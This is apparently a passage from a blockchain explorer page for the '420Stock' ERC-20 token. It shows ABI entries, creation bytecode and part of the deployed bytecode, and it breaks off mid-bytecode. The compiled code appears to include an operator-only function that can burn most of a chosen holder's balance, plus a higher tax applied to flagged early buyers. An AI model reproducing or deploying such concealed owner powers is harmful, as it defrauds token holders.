name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"withdrawTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"wl","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

600680546001600160a01b03191673109e706e82504343b6503997b6f9f153829d476917905560e0604052600860a09081526734323053746f636b60c01b60c0526007906200004f9082620005f8565b5060408051808201909152600681526505350583432360d41b60208201526008906200007c9082620005f8565b50600980546001600160a01b03191661dead1790556103e8620000ad6b015b6a759f4835dc240000006028620006da565b620000b99190620006fa565b600a556103e8620000d86b015b6a759f4835dc240000006028620006da565b620000e49190620006fa565b600b55612710620001036b015b6a759f4835dc240000006005620006da565b6200010f9190620006fa565b600c556000600f8190556010556005601155678ac7230489e80000601255601480546001600160b81b0319167644f1c0f632d191a75bd683e3fe50f90dc1c583a70000001790553480156200016357600080fd5b506007805462000173906200056a565b80601f0160208091040260200160405190810160405280929190818152602001828054620001a1906200056a565b8015620001f25780601f10620001c657610100808354040283529160200191620001f2565b820191906000526020600020905b815481529060010190602001808311620001d457829003601f168201915b50505050506008805462000206906200056a565b80601f016020809104026020016040519081016040528092919081815260200182805462000234906200056a565b8015620002855780601f10620002595761010080835404028352916020019162000285565b820191906000526020600020905b8154815290600101906020018083116200026757829003601f168201915b505050505081600390816200029b9190620005f8565b506004620002aa8282620005f8565b505050620002c7620002c16200043360201b60201c565b62000437565b620002df336b015b6a759f4835dc2400000062000489565b60168054600360ff1991821617909155737a250d5630b4cf539739df2c5dacb4c659f2488d6080526005546001600160a01b039081166000908152600e6020908152604080832080548616600190811790915560068054861685528285208054881683179055601480546301000000908190048816875284872080548a16851790557f37836a7135fae77e265e35732c70286035736c8b57b12590769780e067ead81c80548a1685179055600980548916885285882080548b16861790553080895286892080548c1687179055600d9097527fe491d3ddab46a3ddc2b907c015f7e2686859fac31a4f174b9b79a82620b0324e80548b168617905533885285882080548b168617905595875284872080548a16851790559454871686528386208054891684179055905486168552828520805488168317905554929092049093168252919020805490921617905562000733565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620004e45760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060026000828254620004f891906200071d565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200057f57607f821691505b602082108103620005a057634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200054f57600081815260208120601f850160051c81016020861015620005cf5750805b601f850160051c820191505b81811015620005f057828155600101620005db565b505050505050565b81516001600160401b0381111562000614576200061462000554565b6200062c816200062584546200056a565b84620005a6565b602080601f8311600181146200066457600084156200064b5750858301515b600019600386901b1c1916600185901b178555620005f0565b600085815260208120601f198616915b82811015620006955788860151825594840194600190910190840162000674565b5085821015620006b45787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620006f457620006f4620006c4565b92915050565b6000826200071857634e487b7160e01b600052601260045260246000fd5b500490565b80820180821115620006f457620006f4620006c4565b608051611f6362000780600039600081816102ef015281816109080152818161099901528181610ab601528181610adf0152818161198601528181611a3e0152611ad30152611f636000f3fe6080604052600436106102075760003560e01c806370a0823111610118578063a9059cbb116100a0578063dd62ed3e1161006f578063dd62ed3e146105a4578063e5b37a65146105c4578063ef437ff5146105f4578063f2fde38b14610614578063fca675a81461063457600080fd5b8063a9059cbb14610538578063aa4bde2814610558578063b61b64fa1461056e578063badb1df11461058457600080fd5b80638c0b5e22116100e75780638c0b5e22146104ba5780638da5cb5b146104d057806395d89b41146104ee578063a014f37d14610503578063a457c2d71461051857600080fd5b806370a0823114610440578063715018a614610460578063751039fc146104755780638baa82491461048a57600080fd5b80632fee9e7e1161019b5780633eb5d9b21161016a5780633eb5d9b2146103c857806349bd5a5e146103de57806349df728c1461040357806354b762a614610423578063661e94ba1461043857600080fd5b80632fee9e7e14610346578063313ce5671461037657806333ee17931461039257806339509351146103a857600080fd5b8063095ea7b3116101d7578063095ea7b3146102ad5780631694505e146102dd57806318160ddd1461031157806323b872dd1461032657600080fd5b806299d3861461021357806303fd2a451461022a5780630445b6671461026757806306fdde031461028b57600080fd5b3661020e57005b600080fd5b34801561021f57600080fd5b5061022861065b565b005b34801561023657600080fd5b5060095461024a906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561027357600080fd5b5061027d600c5481565b60405190815260200161025e565b34801561029757600080fd5b506102a06106d3565b60405161025e9190611b47565b3480156102b957600080fd5b506102cd6102c8366004611baa565b610765565b604051901515815260200161025e565b3480156102e957600080fd5b5061024a7f000000000000000000000000000000000000000000000000000000000000000081565b34801561031d57600080fd5b5060025461027d565b34801561033257600080fd5b506102cd610341366004611bd6565b61077f565b34801561035257600080fd5b506102cd610361366004611c17565b600e6020526000908152604090205460ff1681565b34801561038257600080fd5b506040516012815260200161025e565b34801561039e57600080fd5b5061027d60105481565b3480156103b457600080fd5b506102cd6103c3366004611baa565b6107a3565b3480156103d457600080fd5b5061027d600f5481565b3480156103ea57600080fd5b5060165461024a9061010090046001600160a01b031681565b34801561040f57600080fd5b5061022861041e366004611c17565b6107c5565b34801561042f57600080fd5b506102cd6108b7565b6102286108fe565b34801561044c57600080fd5b5061027d61045b366004611c17565b610bbe565b34801561046c57600080fd5b50610228610bd9565b34801561048157600080fd5b50610228610bed565b34801561049657600080fd5b506102cd6104a5366004611c17565b60136020526000908152604090205460ff1681565b3480156104c657600080fd5b5061027d600a5481565b3480156104dc57600080fd5b506005546001600160a01b031661024a565b3480156104fa57600080fd5b506102a0610c0c565b34801561050f57600080fd5b506102cd610c1b565b34801561052457600080fd5b506102cd610533366004611baa565b610c42565b34801561054457600080fd5b506102cd610553366004611baa565b610cbd565b34801561056457600080fd5b5061027d600b5481565b34801561057a57600080fd5b5061027d60155481565b34801561059057600080fd5b5061022861059f366004611c17565b610ccb565b3480156105b057600080fd5b5061027d6105bf366004611c3b565b610d17565b3480156105d057600080fd5b506102cd6105df366004611c17565b600d6020526000908152604090205460ff1681565b34801561060057600080fd5b5061022861060f366004611c82565b610d42565b34801561062057600080fd5b5061022861062f366004611c17565b610d75565b34801561064057600080fd5b5060165461064e9060ff1681565b60405161025e9190611cc6565b610663610deb565b601454610100900460ff16156106c05760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c656400000000000060448201526064015b60405180910390fd5b6014805462ffff00191662010100179055565b6060600380546106e290611cee565b80601f016020809104026020016040519081016040528092919081815260200182805461070e90611cee565b801561075b5780601f106107305761010080835404028352916020019161075b565b820191906000526020600020905b81548152906001019060200180831161073e57829003601f168201915b5050505050905090565b600033610773818585610e45565b60019150505b92915050565b60003361078d858285610f69565b610798858585610fe3565b506001949350505050565b6000336107738185856107b68383610d17565b6107c09190611d3e565b610e45565b6107cd610deb565b6006546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa158015610820573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108449190611d51565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af115801561088f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108b39190611d6a565b5050565b6006546015546040516000926001600160a01b03169180156108fc029184818181858888f193505050501580156108f2573d6000803e3d6000fd5b50506000601555600190565b610906610deb565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610964573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109889190611d87565b6001600160a01b031663c9c65396307f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109f5573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a199190611d87565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610a66573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a8a9190611d87565b601660016101000a8154816001600160a01b0302191690836001600160a01b03160217905550610add307f0000000000000000000000000000000000000000000000000000000000000000600019610e45565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663f305d7193430610b1730610bbe565b600080610b2c6005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610b94573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610bb99190611da4565b505050565b6001600160a01b031660009081526020819052604090205490565b610be1610deb565b610beb600061156a565b565b610bf5610deb565b6b015b6a759f4835dc24000000600a819055600b55565b6060600480546106e290611cee565b6000610c25610deb565b506016805460ff191660031790556000600f819055601055600190565b60003381610c508286610d17565b905083811015610cb05760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016106b7565b6107988286868403610e45565b600033610773818585610fe3565b610cd36115bc565b6001600160a01b0381166000908152600e60205260409020805460ff19169055601254610d14908290610d0582610bbe565b610d0f9190611dd2565b61162b565b50565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610d4a610deb565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b610d7d610deb565b6001600160a01b038116610de25760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016106b7565b610d148161156a565b6005546001600160a01b03163314610beb5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016106b7565b6001600160a01b038316610ea75760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016106b7565b6001600160a01b038216610f085760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016106b7565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610f758484610d17565b90506000198114610fdd5781811015610fd05760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016106b7565b610fdd8484848403610e45565b50505050565b6001600160a01b0383166110095760405162461bcd60e51b81526004016106b790611de5565b6001600160a01b03821661102f5760405162461bcd60e51b81526004016106b790611e2a565b6001600160a01b0383166000908152600d602052604090205460ff1615801561107157506001600160a01b0382166000908152600d602052604090205460ff16155b156110c357601454610100900460ff166110c35760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b60448201526064016106b7565b6001600160a01b0383166000908152600e602052604090205460ff1615801561110557506001600160a01b0382166000908152600e602052604090205460ff16155b1561121f576016546001600160a01b03838116610100909204161461121f57600a5481111561119c5760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e742062656600000060648201526084016106b7565b600b546111a883610bbe565b6111b29083611d3e565b111561121f5760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b60648201526084016106b7565b6001600160a01b0383166000908152600d6020526040902054819060ff1615801561126357506001600160a01b0383166000908152600d602052604090205460ff16155b1561155f576016546001600160a01b0385811661010090920416148061129b57506016546001600160a01b0384811661010090920416145b156114e357600a548211156113185760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e740000000000000060648201526084016106b7565b6016546001600160a01b038581166101009092041614801561135357506001600160a01b0383166000908152600e602052604090205460ff16155b801561136857506001600160a01b0384163014155b156113e657600060165460ff16600381111561138657611386611cb0565b036113af576001600160a01b0383166000908152601360205260409020805460ff191660011790555b60006064600f54846113c19190611e6d565b6113cb9190611e84565b90506113d885308361175d565b6113e28184611dd2565b9150505b6016546001600160a01b038481166101009092041614801561142157506001600160a01b0384166000908152600e602052604090205460ff16155b801561143657506001600160a01b0383163014155b801561144a575060145462010000900460ff165b8015611459575060145460ff16155b156114de576010546001600160a01b03851660009081526013602052604090205460ff16151560010361148b57506011545b6014805460ff191660011790556114a0611887565b6014805460ff19169055600060646114b88386611e6d565b6114c29190611e84565b90506114cf86308361175d565b6114d98185611dd2565b925050505b61155f565b6001600160a01b03841660009081526013602052604090205460ff161515600114801561152357506016546001600160a01b038481166101009092041614155b1561155f57600060646011548461153a9190611e6d565b6115449190611e84565b905061155185308361175d565b61155b8184611dd2565b9150505b610fdd84848361175d565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6006546001600160a01b0316336001600160a01b031614610beb5760405162461bcd60e51b815260206004820152602360248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f706572616044820152623a37b960e91b60648201526084016106b7565b6001600160a01b03821661168b5760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084016106b7565b6001600160a01b038216600090815260208190526040902054818110156116ff5760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b60648201526084016106b7565b6001600160a01b0383166000818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050565b6001600160a01b0383166117835760405162461bcd60e51b81526004016106b790611de5565b6001600160a01b0382166117a95760405162461bcd60e51b81526004016106b790611e2a565b6001600160a01b038316600090815260208190526040902054818110156118215760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016106b7565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610fdd565b61189030610bbe565b60000361189957565b6000806118a530610bbe565b60065490915047906000906118c2906001600160a01b0316610bbe565b90506000600c54841115611928574792506118de84600061192f565b6118e88347611dd2565b9450600c548211156119105780611900576000611902565b845b61190c9086611e84565b6015555b84601560008282546119229190611d3e565b90915550505b5050505050565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061196457611964611ea6565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156119e2573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611a069190611d87565b81600181518110611a1957611a19611ea6565b6001600160a01b03928316602091820292909201015260405163095ea7b360e01b81527f000000000000000000000000000000000000000000000000000000000000000090911660048201526000196024820152309063095ea7b3906044016020604051808303816000875af1158015611a97573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611abb9190611d6a565b5060405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac94790611b109086908690869030904290600401611ebc565b600060405180830381600087803b158015611b2a57600080fd5b505af1158015611b3e573d6000803e3d6000fd5b50505050505050565b600060208083528351808285015260005b81811015611b7457858101830151858201604001528201611b58565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610d1457600080fd5b60008060408385031215611bbd57600080fd5b8235611bc881611b95565b946020939093013593505050565b600080600060608486031215611beb57600080fd5b8335611bf681611b95565b92506020840135611c0681611b95565b929592945050506040919091013590565b600060208284031215611c2957600080fd5b8135611c3481611b95565b9392505050565b60008060408385031215611c4e57600080fd5b8235611c5981611b95565b91506020830135611c6981611b95565b809150509250929050565b8015158114610d1457600080fd5b60008060408385031215611c9557600080fd5b8235611ca081611b95565b91506020830135611c6981611c74565b634e487b7160e01b600052602160045260246000fd5b6020810160048310611ce857634e487b7160e01b600052602160045260246000fd5b91905290565b600181811c90821680611d0257607f821691505b602082108103611d2257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561077957610779611d28565b600060208284031215611d6357600080fd5b5051919050565b600060208284031215611d7c57600080fd5b8151611c3481611c74565b600060208284031215611d9957600080fd5b8151611c3481611b95565b600080600060608486031215611db957600080fd5b8351925060208401519150604084015190509250925092565b8181038181111561077957610779611d28565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761077957610779611d28565b600082611ea157634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611f0c5784516001600160a01b031683529383019391830191600101611ee7565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220539cd2c9165123d1c847720de31df3bb732676468846661eb58f7149ec6d01b764736f6c63430008120033

Deployed Bytecode

0x6080604052600436106102075760003560e01c806370a0823111610118578063a9059cbb116100a0578063dd62ed3e1161006f578063dd62ed3e146105a4578063e5b37a65146105c4578063ef437ff5146105f4578063f2fde38b14610614578063fca675a81461063457600080fd5b8063a9059cbb14610538578063aa4bde2814610558578063b61b64fa1461056e578063badb1df11461058457600080fd5b80638c0b5e22116100e75780638c0b5e22146104ba5780638da5cb5b146104d057806395d89b41146104ee578063a014f37d14610503578063a457c2d71461051857600080fd5b806370a0823114610440578063715018a614610460578063751039fc146104755780638baa82491461048a57600080fd5b80632fee9e7e1161019b5780633eb5d9b21161016a5780633eb5d9b2146103c857806349bd5a5e146103de57806349df728c1461040357806354b762a614610423578063661e94ba1461043857600080fd5b80632fee9e7e14610346578063313ce5671461037657806333ee17931461039257806339509351146103a857600080fd5b8063095ea7b3116101d7578063095ea7b3146102ad5780631694505e146102dd57806318160ddd1461031157806323b872dd1461032657600080fd5b806299d3861461021357806303fd2a451461022a5780630445b6671461026757806306fdde031461028b57600080fd5b3661020e57005b600080fd5b34801561021f57600080fd5b5061022861065b565b005b34801561023657600080fd5b5060095461024a906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561027357600080fd5b5061027d600c5481565b60405190815260200161025e565b34801561029757600080fd5b506102a06106d3565b60405161025e9190611b47565b3480156102b957600080fd5b506102cd6102c8366004611baa565b610765565b604051901515815260200161025e565b3480156102e957600080fd5b5061024a7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b34801561031d57600080fd5b5060025461027d565b34801561033257600080fd5b506102cd610341366004611bd6565b61077f565b34801561035257600080fd5b506102cd610361366004611c17565b600e6020526000908152604090205460ff1681565b34801561038257600080fd5b506040516012815260200161025e565b34801561039e57600080fd5b5061027d60105481565b3480156103b457600080fd5b506102cd6103c3366004611baa565b6107a3565b3480156103d457600080fd5b5061027d600f5481565b3480156103ea57600080fd5b5060165461024a9061010090046001600160a01b031681565b34801561040f57600080fd5b5061022861041e366004611c17565b6107c5565b34801561042f57600080fd5b506102cd6108b7565b6102286108fe565b34801561044c57600080fd5b5061027d61045b366004611c17565b610bbe565b34801561046c57600080fd5b50610228610bd9565b34801561048157600080fd5b50610228610bed565b34801561049657600080fd5b506102cd6104a5366004611c17565b60136020526000908152604090205460ff1681565b3480156104c657600080fd5b5061027d600a5481565b3480156104dc57600080fd5b506005546001600160a01b031661024a565b3480156104fa57600080fd5b506102a0610c0c565b34801561050f57600080fd5b506102cd610c1b565b34801561052457600080fd5b506102cd610533366004611baa565b610c42565b34801561054457600080fd5b506102cd610553366004611baa565b610cbd565b34801561056457600080fd5b5061027d600b5481565b34801561057a57600080fd5b5061027d60155481565b34801561059057600080fd5b5061022861059f366004611c17565b610ccb565b3480156105b057600080fd5b5061027d6105bf366004611c3b565b610d17565b3480156105d057600080fd5b506102cd6105df366004611c17565b600d6020526000908152604090205460ff1681565b34801561060057600080fd5b5061022861060f366004611c82565b610d42565b34801561062057600080fd5b5061022861062f366004611c17565b610d75565b34801561064057600080fd5b5060165461064e9060ff1681565b60405161025e9190611cc6565b610663610deb565b601454610100900460ff16156106c05760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c656400000000000060448201526064015b60405180910390fd5b6014805462ffff00191662010100179055565b6060600380546106e290611cee565b80601f016020809104026020016040519081016040528092919081815260200182805461070e90611cee565b801561075b5780601f106107305761010080835404028352916020019161075b565b820191906000526020600020905b81548152906001019060200180831161073e57829003601f168201915b5050505050905090565b600033610773818585610e45565b60019150505b92915050565b60003361078d858285610f69565b610798858585610fe3565b506001949350505050565b6000336107738185856107b68383610d17565b6107c09190611d3e565b610e45565b6107cd610deb565b6006546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa158015610820573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108449190611d51565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af115801561088f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108b39190611d6a565b5050565b6006546015546040516000926001600160a01b03169180156108fc029184818181858888f193505050501580156108f2573d6000803e3d6000fd5b50506000601555600190565b610906610deb565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610964573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109889190611d87565b6001600160a01b031663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109f5573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a199190611d87565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610a66573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a8a9190611d87565b601660016101000a8154816001600160a01b0302191690836001600160a01b03160217905550610add307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d600019610e45565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663f305d7193430610b1730610bbe565b600080610b2c6005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610b94573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610bb99190611da4565b505050565b6001600160a01b031660009081526020819052604090205490565b610be1610deb565b610beb600061156a565b565b610bf5610deb565b6b015b6a759f4835dc24000000600a819055600b55565b6060600480546106e290611cee565b6000610c25610deb565b506016805460ff191660031790556000600f819055601055600190565b60003381610c508286610d17565b905083811015610cb05760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016106b7565b6107988286868403610e45565b600033610773818585610fe3565b610cd36115bc565b6001600160a01b0381166000908152600e60205260409020805460ff19169055601254610d14908290610d0582610bbe565b610d0f9190611dd2565b61162b565b50565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610d4a610deb565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b610d7d610deb565b6001600160a01b038116610de25760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016106b7565b610d148161156a565b6005546001600160a01b03163314610beb5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016106b7565b6001600160a01b038316610ea75760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016106b7565b6001600160a01b038216610f085760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016106b7565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610f758484610d17565b90506000198114610fdd5781811015610fd05760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016106b7565b610fdd8484848403610e45565b50505050565b6001600160a01b0383166110095760405162461bcd60e51b81526004016106b790611de5565b6001600160a01b03821661102f5760405162461bcd60e51b81526004016106b790611e2a565b6001600160a01b0383166000908152600d602052604090205460ff1615801561107157506001600160a01b0382166000908152600d602052604090205460ff16155b156110c357601454610100900460ff166110c35760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b60448201526064016106b7565b6001600160a01b0383166000908152600e602052604090205460ff1615801561110557506001600160a01b0382166000908152600e602052604090205460ff16155b1561121f576016546001600160a01b03838116610100909204161461121f57600a5481111561119c5760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e742062656600000060648201526084016106b7565b600b546111a883610bbe565b6111b29083611d3e565b111561121f5760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b60648201526084016106b7565b6001600160a01b0383166000908152600d6020526040902054819060ff1615801561126357506001600160a01b0383166000908152600d602052604090205460ff16155b1561155f576016546001600160a01b0385811661010090920416148061129b57506016546001600160a01b0384811661010090920416145b156114e357600a548211156113185760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e740000000000000060648201526084016106b7565b6016546001600160a01b038581166101009092041614801561135357506001600160a01b0383166000908152600e602052604090205460ff16155b801561136857506001600160a01b0384163014155b156113e657600060165460ff16600381111561138657611386611cb0565b036113af576001600160a01b0383166000908152601360205260409020805460ff191660011790555b60006064600f54846113c19190611e6d565b6113cb9190611e84565b90506113d885308361175d565b6113e28184611dd2565b9150505b6016546001600160a01b038481166101009092041614801561142157506001600160a01b0384166000908152600e602052604090205460ff16155b801561143657506001600160a01b0383163014155b801561144a575060145462010000900460ff165b8015611459575060145460ff16155b156114de576010546001600160a01b03851660009081526013602052604090205460ff16151560010361148b57506011545b6014805460ff191660011790556114a0611887565b6014805460ff19169055600060646114b88386611e6d565b6114c29190611e84565b90506114cf86308361175d565b6114d98185611dd2565b925050505b61155f565b6001600160a01b03841660009081526013602052604090205460ff161515600114801561152357506016546001600160a01b038481166101009092041614155b1561155f57600060646011548461153a9190611e6d565b6115449190611e84565b905061155185308361175d565b61155b8184611dd2565b9150505b610fdd84848361175d565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6006546001600160a01b0316336001600160a01b031614610beb5760405162461bcd60e51b815260206004820152602360248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f706572616044820152623a37b960e91b60648201526084016106b7565b6001600160a01b03821661168b5760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b60648201526084016106b7565b6001600160a01b038216600090815260208190526040902054818110156116ff5760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b60648201526084016106b7565b6001600160a01b0383166000818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050565b6001600160a01b0383166117835760405162461bcd60e51b81526004016106b790611de5565b6001600160a01b0382166117a95760405162461bcd60e51b81526004016106b790611e2a565b6001600160